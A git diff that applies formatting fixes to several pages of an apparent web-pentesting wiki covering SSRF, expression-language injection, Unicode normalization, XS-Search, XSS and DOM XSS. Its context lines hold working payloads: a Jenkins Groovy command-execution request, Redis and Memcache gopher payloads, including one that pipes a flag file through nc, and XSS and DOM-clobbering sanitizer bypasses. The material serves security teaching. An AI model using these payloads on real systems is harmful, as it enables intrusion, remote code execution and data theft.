@@ -921,7 +921,7 @@ pay = 'public class x {public x(){"%s".execute()}}' % cmd
 data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
 ```
 
-### Hystrix Dashboard <a href="hystrix-dashboard" id="hystrix-dashboard"></a>
+### Hystrix Dashboard <a href="#hystrix-dashboard" id="hystrix-dashboard"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080**
 
@@ -933,7 +933,7 @@ Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1
 /proxy.stream?origin=http://SSRF_CANARY/
 ```
 
-### W3 Total Cache <a href="w3-total-cache" id="w3-total-cache"></a>
+### W3 Total Cache <a href="#w3-total-cache" id="w3-total-cache"></a>
 
 **Commonly bound ports: 80,443 (SSL)**
 
@@ -957,7 +957,7 @@ Connection: close
 
 **SSRF Canary**
 
-The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3\_total_cache.html)
+The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3\_total\_cache.html)
 
 This PHP code will generate a payload for your SSRF Canary host (replace `url` with your canary host):
 
@@ -973,7 +973,7 @@ echo($req);
 ?>
 ```
 
-### Docker <a href="docker" id="docker"></a>
+### Docker <a href="#docker" id="docker"></a>
 
 **Commonly bound ports: 2375, 2376 (SSL)**
 
@@ -998,7 +998,7 @@ Content-Type: application/json
 
 Replace alpine with an arbitrary image you would like the docker container to run.
 
-### Gitlab Prometheus Redis Exporter <a href="gitlab-prometheus-redis-exporter" id="gitlab-prometheus-redis-exporter"></a>
+### Gitlab Prometheus Redis Exporter <a href="#gitlab-prometheus-redis-exporter" id="gitlab-prometheus-redis-exporter"></a>
 
 **Commonly bound ports: 9121**
 
@@ -1014,13 +1014,13 @@ http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
 
 **Possible via Gopher**
 
-### Redis <a href="redis" id="redis"></a>
+### Redis <a href="#redis" id="redis"></a>
 
 **Commonly bound port: 6379**
 
 Recommended reading:
 
-* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html)
+* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html)
 * [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis)
 
 **RCE via Cron** - [Gopher Attack Surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/)
@@ -1079,7 +1079,7 @@ if __name__=="__main__":
     print payload
 ```
 
-**RCE via authorized_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
+**RCE via authorized\_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
 
 ```python
 import urllib
@@ -1126,7 +1126,7 @@ While this required authenticated access to GitLab to exploit, I am including th
 git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
 ```
 
-### Memcache <a href="memcache" id="memcache"></a>
+### Memcache <a href="#memcache" id="memcache"></a>
 
 **Commonly bound port: 11211**
 
@@ -1139,7 +1139,7 @@ gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:
 gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
 ```
 
-### Apache Tomcat <a href="apache-tomcat" id="apache-tomcat"></a>
+### Apache Tomcat <a href="#apache-tomcat" id="apache-tomcat"></a>
 
 **Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
 
@@ -1151,7 +1151,7 @@ CTF writeup using this technique:
 
 [From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/)
 
-### FastCGI <a href="fastcgi" id="fastcgi"></a>
+### FastCGI <a href="#fastcgi" id="fastcgi"></a>
 
 **Commonly bound ports: 80,443 (SSL)**
 
@@ -1163,7 +1163,7 @@ gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%
 
 **Tools**
 
-### Gopherus <a href="gopherus" id="gopherus"></a>
+### Gopherus <a href="#gopherus" id="gopherus"></a>
 
 * [Gopherus - Github](https://github.com/tarunkant/Gopherus)
 * [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
@@ -1177,9 +1177,9 @@ This tool generates Gopher payloads for:
 * Zabbix
 * Memcache
 
-### SSRF Proxy <a href="ssrf-proxy" id="ssrf-proxy"></a>
+### SSRF Proxy <a href="#ssrf-proxy" id="ssrf-proxy"></a>
 
-* [SSRF Proxy](https://github.com/bcoles/ssrf_proxy)
+* [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)
 
 SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
 
diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
index e2e55810..fe5e17ac 100644
--- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
+++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
@@ -12,7 +12,7 @@ EL  provides an important mechanism for enabling the presentation layer (web pag
 
 The EL is used by **several JavaEE technologies**, such as JavaServer Faces technology, JavaServer Pages (JSP) technology, and Contexts and Dependency Injection for Java EE (CDI). The EL can also be used in stand-alone environments.
 
-Java applications are** easily recognizable** as they tend to use extensions as **.jsp** or **.jsf**, throw **stack errors** and use** term like "Serverlet" in the headers**.
+Java applications are **easily recognizable** as they tend to use extensions as **.jsp** or **.jsf**, throw **stack errors** and use **term like "Serverlet" in the headers**.
 
 {% hint style="info" %}
 Depending on the **EL version** some **features** might be **On** or **Off** and usually some **characters** may be **disallowed**.
@@ -24,9 +24,9 @@ Depending on the **EL version** some **features** might be **On** or **Off** and
 
 Download from the [**Maven**](https://mvnrepository.com) repository the jar files:
 
-* `commons-lang3-3.9.jar `
+* `commons-lang3-3.9.jar`&#x20;
 * `spring-core-5.2.1.RELEASE.jar`
-* `commons-logging-1.2.jar `
+* `commons-logging-1.2.jar`&#x20;
 * `spring-expression-5.2.1.RELEASE.jar`
 
 And create a the following `Main.java` file:
diff --git a/pentesting-web/unicode-normalization-vulnerability.md b/pentesting-web/unicode-normalization-vulnerability.md
index 57992022..6ea72a30 100644
--- a/pentesting-web/unicode-normalization-vulnerability.md
+++ b/pentesting-web/unicode-normalization-vulnerability.md
@@ -5,7 +5,7 @@
 Normalization ensures two strings that may use a different binary representation for their characters have the same binary value after normalization.
 
 There are two overall types of equivalence between characters, “**Canonical Equivalence**” and “**Compatibility Equivalence**”:\
-**Canonical Equivalent** characters are assumed to have the same appearance and meaning when printed or displayed. **Compatibility Equivalence** is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently. There are **4 Normalization algorithms** defined by the **Unicode **standard; **NFC, NFD, NFKD and NFKD**, each applies Canonical and Compatibility normalization techniques in a different way. You can read more on the different techniques at Unicode.org.
+**Canonical Equivalent** characters are assumed to have the same appearance and meaning when printed or displayed. **Compatibility Equivalence** is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently. There are **4 Normalization algorithms** defined by the **Unicode** standard; **NFC, NFD, NFKD and NFKD**, each applies Canonical and Compatibility normalization techniques in a different way. You can read more on the different techniques at Unicode.org.
 
 ### Unicode Encoding
 
@@ -22,21 +22,21 @@ An example of how Unicode normalise two different bytes representing the same ch
 
 ![](<../.gitbook/assets/image (156).png>)
 
-**A list of Unicode equivalent characters can be found here:** [https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html)
+**A list of Unicode equivalent characters can be found here:** [https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html)
 
 ### Discovering
 
-If you can find inside a webapp a value that is being echoed back, you could try to send** ‘KELVIN SIGN’ (U+0212A)** which **normalises to "K" **(you can send it as `%e2%84%aa`). **If a "K" is echoed back**, then, some kind of **Unicode normalisation **is being performed.
+If you can find inside a webapp a value that is being echoed back, you could try to send **‘KELVIN SIGN’ (U+0212A)** which **normalises to "K"** (you can send it as `%e2%84%aa`). **If a "K" is echoed back**, then, some kind of **Unicode normalisation** is being performed.
 
-Other **example**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` after **unicode **is `Leonishan`.
+Other **example**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` after **unicode** is `Leonishan`.
 
 ## **Vulnerable Examples**
 
 ### **SQL Injection filter bypass**
 
-Imagine a web page that is using the character `'` to create SQL queries with the user input. This web, as a security measure, **deletes **all occurrences of the character **`'`** from the user input, but **after that deletion** and **before the creation **of the query, it **normalises **using **Unicode **the input of the user.
+Imagine a web page that is using the character `'` to create SQL queries with the user input. This web, as a security measure, **deletes** all occurrences of the character **`'`** from the user input, but **after that deletion** and **before the creation** of the query, it **normalises** using **Unicode** the input of the user.
 
-Then, a malicious user could insert a different Unicode character equivalent to` ' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
+Then, a malicious user could insert a different Unicode character equivalent to `' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
 
 ![](<../.gitbook/assets/image (157).png>)
 
@@ -80,10 +80,10 @@ Notice that for example the first Unicode character purposed can be sent as: `%e
 
 ## References
 
-**All the information of this page was taken from: **[**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/#**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/#)
+**All the information of this page was taken from:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/#**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/#)
 
 **Other references:**
 
 * ****[**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)****
 * ****[**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)****
-* ****[**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)****
+* ****[**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)****
diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md
index eee68828..25b22f39 100644
--- a/pentesting-web/web-vulnerabilities-methodology.md
+++ b/pentesting-web/web-vulnerabilities-methodology.md
@@ -93,7 +93,7 @@ There are several specific functionalities were some workarounds might be useful
 ### **Structured objects / Specific functionalities**
 
 Some functionalities will require the **data to be structured on a very specific format** (like a language serialized object or a XML). Therefore, it's more easy to identify is the application might be vulnerable as it needs to be processing that kind of data.\
-Some** specific functionalities** my be also vulnerable if a **specific format of the input is used** (like Email Header Injections).&#x20;
+Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** (like Email Header Injections).&#x20;
 
 * [ ] ****[**Deserialization**](deserialization/)****
 * [ ] ****[**Email Header Injection**](email-header-injection.md)****
diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search.md
index 7129113f..2969e5f7 100644
--- a/pentesting-web/xs-search.md
+++ b/pentesting-web/xs-search.md
@@ -1,46 +1,46 @@
 # XS-Search
 
-**The best resource to learn XS-Search is **[**https://xsleaks.dev/**](https://xsleaks.dev)
+**The best resource to learn XS-Search is** [**https://xsleaks.dev/**](https://xsleaks.dev)
 
 ## XS-Search Time attack
 
-Basically, you exploit a **CSRF vulnerability **to make a specific user access some **information **that the **victim can access** but you can't. Then, you **check **the **time **it take the request to be responded and depending on that you can know if the content was correctly accessed or not.
+Basically, you exploit a **CSRF vulnerability** to make a specific user access some **information** that the **victim can access** but you can't. Then, you **check** the **time** it take the request to be responded and depending on that you can know if the content was correctly accessed or not.
 
-For example, imagine that the **admin of a web** page can **access all **the inside the **webfiles  **service and **you only **can access **yours**, and you want to know the **content **of a **file **that starts with the string "_**flag**_".
+For example, imagine that the **admin of a web** page can **access all** the inside the **webfiles**  service and **you only** can access **yours**, and you want to know the **content** of a **file** that starts with the string "_**flag**_".
 
-There is a **CSRF **vulnerability in the **seach by content** function and you can make the **admin visit any page**. Then, you could make the admin visit a malicious web server (yours) that will **exploit **the **CSRF **and will make the victim **search for **the file that starts with "_**flag**_". The attacker will make a **loop **so it will make the victim **search for every possibility** in: _flagX_. Then, if a character took **more time **that the rest, you can **asume **that it was the **correct **one and you can start a **new loop** with "_flag{X_" until you get the flag.
+There is a **CSRF** vulnerability in the **seach by content** function and you can make the **admin visit any page**. Then, you could make the admin visit a malicious web server (yours) that will **exploit** the **CSRF** and will make the victim **search for** the file that starts with "_**flag**_". The attacker will make a **loop** so it will make the victim **search for every possibility** in: _flagX_. Then, if a character took **more time** that the rest, you can **asume** that it was the **correct** one and you can start a **new loop** with "_flag{X_" until you get the flag.
 
-That is the **idea **but in the **real world **you need queries that retrive content take **much more time** that the queries that doesn't return anything.
+That is the **idea** but in the **real world** you need queries that retrive content take **much more time** that the queries that doesn't return anything.
 
 For more information you can read:
 
 * [https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549](https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549)
-* [https://www.researchgate.net/publication/280738245\_Cross-Site_Search_Attacks](https://www.researchgate.net/publication/280738245\_Cross-Site_Search_Attacks)
+* [https://www.researchgate.net/publication/280738245\_Cross-Site\_Search\_Attacks](https://www.researchgate.net/publication/280738245\_Cross-Site\_Search\_Attacks)
 
 ## XS-Search - Iframe
 
-Suppose that you can **insert **the **page **that has the **secret **content** inside an Iframe**.
+Suppose that you can **insert** the **page** that has the **secret** content **inside an Iframe**.
 
-You can **make the victim search** for the file that contains "_**flag**_" using an **Iframe** (exploiting a CSRF like in the prevous situation). Inside the Iframe you know that the _**onload event **_will be **executed always at least once**. Then, you can **change **the **URL **of the **iframe **but changing only the **content **of the **hash **inside the URL.
+You can **make the victim search** for the file that contains "_**flag**_" using an **Iframe** (exploiting a CSRF like in the prevous situation). Inside the Iframe you know that the _**onload event**_ will be **executed always at least once**. Then, you can **change** the **URL** of the **iframe** but changing only the **content** of the **hash** inside the URL.
 
 For example:
 
 1. **URL1**: www.attacker.com/xssearch#try1
 2. **URL2**: www.attacker.com/xssearch#try2
 
-If the first URL was **successfully loaded**, then, when **changing **the **hash **part of the URL the **onload **event **won't be triggered** again. But **if **the page had some kind of **error **when **loading**, then, the **onload **event will be **triggered again**.
+If the first URL was **successfully loaded**, then, when **changing** the **hash** part of the URL the **onload** event **won't be triggered** again. But **if** the page had some kind of **error** when **loading**, then, the **onload** event will be **triggered again**.
 
-Then, you can **distinguish between **a **correctly **loaded page or page that has an **error **when is accessed.
+Then, you can **distinguish between** a **correctly** loaded page or page that has an **error** when is accessed.
 
 If you can make the page error when the correct content is accessed and make it load correctly when any content is accessed, then you can make a loop to extract all the information without meassuring the time.
 
 ### Iframe Chrome XSS Auditor
 
-Imagine the **same situation as in the Timing attack method **and you also know that the **admin **is using a **Chrome browser** (for example, Chrome-headless) **with Chrome XSS Auditor.**
+Imagine the **same situation as in the Timing attack method** and you also know that the **admin** is using a **Chrome browser** (for example, Chrome-headless) **with Chrome XSS Auditor.**
 
-Then, you can use **iframes **to make the victim **search **for the page containing "_**flagX**_" (beeing X **any **possible **character**)inside a loop, and you also add to the URL inside the iframes a **fake parameter **that **contains javascript code that will only appear when a valid content is retrived**.
+Then, you can use **iframes** to make the victim **search** for the page containing "_**flagX**_" (beeing X **any** possible **character**)inside a loop, and you also add to the URL inside the iframes a **fake parameter** that **contains javascript code that will only appear when a valid content is retrived**.
 
-For example, if when you **search for **the **content**_** "my file"**_ the web server responds with a page that **includes **this **javascript **code:
+For example, if when you **search for** the **content **_**"my file"**_ the web server responds with a page that **includes** this **javascript** code:
 
 ```
 <script>console.log("you found someting");</script>
@@ -52,9 +52,9 @@ If you send a query like:
 www.victim.com/search?q=my+file&fake_xss=<script>console.log("you+found+something");<script>
 ```
 
-The **Chrome XSS Auditor will block** the page and an **error **will appear.
+The **Chrome XSS Auditor will block** the page and an **error** will appear.
 
-Then, you can use Chrome XSS Auditor to **launch an error **when a **valid response is sent** from the victim server. Then, with the **Iframe **trick you can **detect **when you have find a **file **that **contains **"_**flag**_" **and the next valid character**.
+Then, you can use Chrome XSS Auditor to **launch an error** when a **valid response is sent** from the victim server. Then, with the **Iframe** trick you can **detect** when you have find a **file** that **contains** "_**flag**_" **and the next valid character**.
 
 For more information: [https://www.youtube.com/watch?v=HcrQy0C-hEA](https://www.youtube.com/watch?v=HcrQy0C-hEA)
 
@@ -66,21 +66,21 @@ Please, notice that you will steal information returned to a user and not any co
 
 ## Custom Detection
 
-In the **fbcft2019 **the **challenge**: **secret note keeper **was resolved exploiting a XS-Search.
+In the **fbcft2019** the **challenge**: **secret note keeper** was resolved exploiting a XS-Search.
 
-You could make the **administrator **(a headlessChrome)** visit any page **and there was a **CSRF **vulnerable page that was able to** search files by content**. You also **knew **that the **flag starts **by _**fb{ **_and only the admin had access to it.
+You could make the **administrator** (a headlessChrome) **visit any page** and there was a **CSRF** vulnerable page that was able to **search files by content**. You also **knew** that the **flag starts** by _**fb{**_ and only the admin had access to it.
 
-It was also important to notice that when you made a **search**, the results of the seach **appeared inside **an **iframe **(if something was found). And** none iframe appeared** if **anything **was found.
+It was also important to notice that when you made a **search**, the results of the seach **appeared inside** an **iframe** (if something was found). And **none iframe appeared** if **anything** was found.
 
-So, you could make the admin visit your exploit that will be a **loop of every possible charater** inside _fb{X _inside an iframe. And using:
+So, you could make the admin visit your exploit that will be a **loop of every possible charater** inside _fb{X_ inside an iframe. And using:
 
 ```
 contentWindow.frames.length != 0
 ```
 
-You could **check **how **many iframes **where created **inside your iframe**, and** if an**y, then the **character **would be **correct **and you could start extracting the next one.
+You could **check** how **many iframes** where created **inside your iframe**, and **if an**y, then the **character** would be **correct** and you could start extracting the next one.
 
-This is a code example of this from: [https://sectt.github.io/writeups/FBCTF19/secret_note_keeper/README](https://sectt.github.io/writeups/FBCTF19/secret_note_keeper/README)
+This is a code example of this from: [https://sectt.github.io/writeups/FBCTF19/secret\_note\_keeper/README](https://sectt.github.io/writeups/FBCTF19/secret\_note\_keeper/README)
 
 ```
 <!DOCTYPE html>
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index e9b10a22..2760805e 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -91,7 +91,7 @@ Some **examples**:
 
 When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
 For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
-_**Note: A HTML comment can be closed using ****`-->`**** or ****`--!>`**_
+_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_
 
 In this case and if no black/whitelisting is used, you could use payloads like:
 
@@ -183,7 +183,7 @@ Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30
 The last one is using 2 unicode characters which expands to 5: telsr\
 More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
 To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).\
-**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads)** **and [**here**](https://tinyxss.terjanq.me).
+**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) **** and [**here**](https://tinyxss.terjanq.me).
 
 ### Click XSS - Clickjacking
 
@@ -974,7 +974,7 @@ So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going
 [server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
 {% endcontent-ref %}
 
-If you cannot inject HTML tags it could be worth it to try to** inject PDF data**:
+If you cannot inject HTML tags it could be worth it to try to **inject PDF data**:
 
 {% content-ref url="pdf-injection.md" %}
 [pdf-injection.md](pdf-injection.md)
diff --git a/pentesting-web/xss-cross-site-scripting/dom-xss.md b/pentesting-web/xss-cross-site-scripting/dom-xss.md
index 123005fb..0ed17e7a 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -13,7 +13,7 @@
 Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session.
 
 {% hint style="info" %}
-**You can find a more updated list of sources and sinks in **[**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)****
+**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)****
 {% endhint %}
 
 **Common sources:**
@@ -71,7 +71,7 @@ Database
 
 &#x20;The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`.
 
-This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using **any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS.
+This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using** any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS.
 
 ## Tools to find them
 
@@ -85,7 +85,7 @@ From: [https://portswigger.net/web-security/dom-based/open-redirection](https://
 
 #### How
 
-DOM-based open-redirection vulnerabilities arise when a script writes **attacker-controllable data** into a **sink **that can trigger **cross-domain navigation**.
+DOM-based open-redirection vulnerabilities arise when a script writes **attacker-controllable data** into a **sink** that can trigger **cross-domain navigation**.
 
 Remember that **if you can start the URL** were the victim is going to be **redirected**, you could execute **arbitrary code** like: **`javascript:alert(1)`**
 
@@ -153,10 +153,10 @@ From: [https://portswigger.net/web-security/dom-based/document-domain-manipulati
 
 #### How
 
-Document-domain manipulation vulnerabilities arise when a script uses **attacker-controllable data to set **the **`document.domain`** property.
+Document-domain manipulation vulnerabilities arise when a script uses **attacker-controllable data to set** the **`document.domain`** property.
 
-&#x20;The `document.domain` property is used by browsers in their **enforcement **of the **same origin policy**. If **two pages** from **different **origins explicitly set the **same `document.domain`** value, then those two pages can **interact in unrestricted ways**.\
-Browsers **generally enforce some restrictions** on the values that can be assigned to `document.domain`, and may prevent the use of completely different values than the actual origin of the page.** But this doesn't occur always **and they usually** allow to use child **or **parent** domains.
+&#x20;The `document.domain` property is used by browsers in their **enforcement** of the **same origin policy**. If **two pages** from **different** origins explicitly set the **same `document.domain`** value, then those two pages can **interact in unrestricted ways**.\
+Browsers **generally enforce some restrictions** on the values that can be assigned to `document.domain`, and may prevent the use of completely different values than the actual origin of the page. **But this doesn't occur always** and they usually **allow to use child** or **parent** domains.
 
 #### Sinks
 
@@ -198,7 +198,7 @@ From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipu
 
 #### How
 
-Ajax request manipulation vulnerabilities arise when a script writes **attacker-controllable data into the an Ajax request **that is issued using an `XmlHttpRequest` object.
+Ajax request manipulation vulnerabilities arise when a script writes **attacker-controllable data into the an Ajax request** that is issued using an `XmlHttpRequest` object.
 
 #### Sinks
 
@@ -266,7 +266,7 @@ From: [https://portswigger.net/web-security/dom-based/client-side-xpath-injectio
 
 #### How
 
-DOM-based XPath-injection vulnerabilities arise when a script incorporates** attacker-controllable data into an XPath query**.
+DOM-based XPath-injection vulnerabilities arise when a script incorporates **attacker-controllable data into an XPath query**.
 
 #### Sinks
 
@@ -281,7 +281,7 @@ From: [https://portswigger.net/web-security/dom-based/client-side-json-injection
 
 #### How
 
-DOM-based JSON-injection vulnerabilities arise when a script incorporates** attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application**.
+DOM-based JSON-injection vulnerabilities arise when a script incorporates **attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application**.
 
 #### Sinks
 
@@ -297,8 +297,8 @@ From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](
 
 #### How
 
-Web-message vulnerabilities arise when a script sends **attacker-controllable data as a web message to another document **within the browser.\
-**Example **of vulnerable Web-message manipulation in [https://portswigger.net/web-security/dom-based/controlling-the-web-message-source](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source)
+Web-message vulnerabilities arise when a script sends **attacker-controllable data as a web message to another document** within the browser.\
+**Example** of vulnerable Web-message manipulation in [https://portswigger.net/web-security/dom-based/controlling-the-web-message-source](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source)
 
 #### Sinks
 
@@ -345,7 +345,7 @@ From: [https://portswigger.net/web-security/dom-based/denial-of-service](https:/
 
 #### How
 
-DOM-based denial-of-service vulnerabilities arise when a script passes** attacker-controllable data in an unsafe way to a problematic platform API**, such as an API whose invocation can cause the user's computer to consume **excessive amounts of CPU or disk space**. This may result in side effects if the browser restricts the functionality of the website, for example, by rejecting attempts to store data in `localStorage` or killing busy scripts.
+DOM-based denial-of-service vulnerabilities arise when a script passes **attacker-controllable data in an unsafe way to a problematic platform API**, such as an API whose invocation can cause the user's computer to consume **excessive amounts of CPU or disk space**. This may result in side effects if the browser restricts the functionality of the website, for example, by rejecting attempts to store data in `localStorage` or killing busy scripts.
 
 #### Sinks
 
@@ -377,8 +377,8 @@ To exploit this vulnerable code, you could inject the following HTML to clobber
 
 `<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>`
 
-Injecting that data `window.someObject.url `is going to be `href=//malicious-website.com/malicious.js`
+Injecting that data `window.someObject.url` is going to be `href=//malicious-website.com/malicious.js`
 
-**Trick**:  `DOMPurify` allows you to use the **`cid:`** protocol, which **does not URL-encode double-quotes**. This means you can **inject an encoded double-quote that will be decoded at runtime**. Therefore, injecting something like `<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">` will make the HTML encoded `&quot;` to be** decoded on runtime** and **escape **from the attribute value to **create **the **`onerror`** event.
+**Trick**:  `DOMPurify` allows you to use the **`cid:`** protocol, which **does not URL-encode double-quotes**. This means you can **inject an encoded double-quote that will be decoded at runtime**. Therefore, injecting something like `<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">` will make the HTML encoded `&quot;` to be **decoded on runtime** and **escape** from the attribute value to **create** the **`onerror`** event.
 
-Another common technique consists on using **`form`** element. Some client-side libraries will go through the attributes of the created form element to sanitised it. But, if you **create an `input`**inside the form with` id=attributes` , you will **clobber the attributes property** and the sanitizer **won't **be able to go through the **real attributes**.
+Another common technique consists on using **`form`** element. Some client-side libraries will go through the attributes of the created form element to sanitised it. But, if you **create an `input`**inside the form with `id=attributes` , you will **clobber the attributes property** and the sanitizer **won't** be able to go through the **real attributes**.
diff --git a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index dbc5075c..73e237cb 100644
--- a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -140,7 +140,7 @@ plusone = a => a + 100;
 
 ### Bind function
 
-The bind function allow to create a **copy **of a **function modifying **the **`this`** object and the **parameters **given.
+The bind function allow to create a **copy** of a **function modifying** the **`this`** object and the **parameters** given.
 
 ```javascript
 //This will use the this object and print "Hello World"
@@ -184,14 +184,14 @@ console.log(this.afunc.toString()); //This will print the code of the function
 console.log(global.afunc.toString()); //This will print the code of the function
 ```
 
-In cases where the **function doesn't have any name**, you can still print the** function code** from within:
+In cases where the **function doesn't have any name**, you can still print the **function code** from within:
 
 ```javascript
 (function (){ return arguments.callee.toString(); })()
 (function (){ return arguments[0]; })("arg0")
 ```
 
-Some **random **ways to **extract the code** of a function (even comments) from another function:
+Some **random** ways to **extract the code** of a function (even comments) from another function:
 
 ```javascript
